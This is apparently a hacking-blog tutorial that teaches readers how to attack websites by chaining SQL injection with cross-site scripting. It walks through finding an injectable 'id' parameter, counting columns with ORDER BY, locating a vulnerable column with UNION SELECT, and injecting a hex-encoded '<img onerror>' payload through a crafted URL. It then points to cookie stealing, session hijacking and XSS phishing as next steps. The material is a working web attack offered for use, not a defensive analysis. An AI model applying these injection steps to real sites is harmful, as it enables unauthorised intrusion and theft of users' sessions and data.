Method: XSS Injection with SQLi (XSSQLi) | BY MR:47{XYBER SHEIKH} ~ S0ft Hcks!

I am going to tell you that how to attack a website using XSS (Cross-Site-Scripting + SQLi).

This is pretty simple! We just have to inject our JavaScript code in the website

I will not teach you the basics of SQLi, you can find them on my this tutorial.

Step 1: First we have to find a SQLi vul. Site.
Like this:
http://www.site.in/index.php?id=3

Step 2: Finding the number of columns on the site using ORDER BY method.

Suppose our site have 9 columns!

Step 3: Finding the Vulnerable column using UNION ALL SELECT methods.

And the most vul column is 3!

Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.

Our XSS injection Payload
<img src=x onerror=confirm(/XSS/)>

Our Hex Encoded Payload

0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e

Step 5: Injecting The Payload Into Our Site!

Like This:

http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5,6,7,8,9--+

NOTE:

The above url will output the our XSS payload into the Website. This one is basic XSS payload, now we are free to do other things using XSS like Cookie stealing, XSS phishing, XSS iFrame Phishing, Chained XSS, Session Hijacking, CSRF attack, XssDdos and other attacks

S0ft Hcks! | By MR:47{XYBER SHEIKH}

Method: XSS Injection with SQLi (XSSQLi) | BY MR:47{XYBER SHEIKH}

Pages - Menu

Popular Posts

S0ft Hcks! | By MR:47{XYBER SHEIKH}

Comment

Labels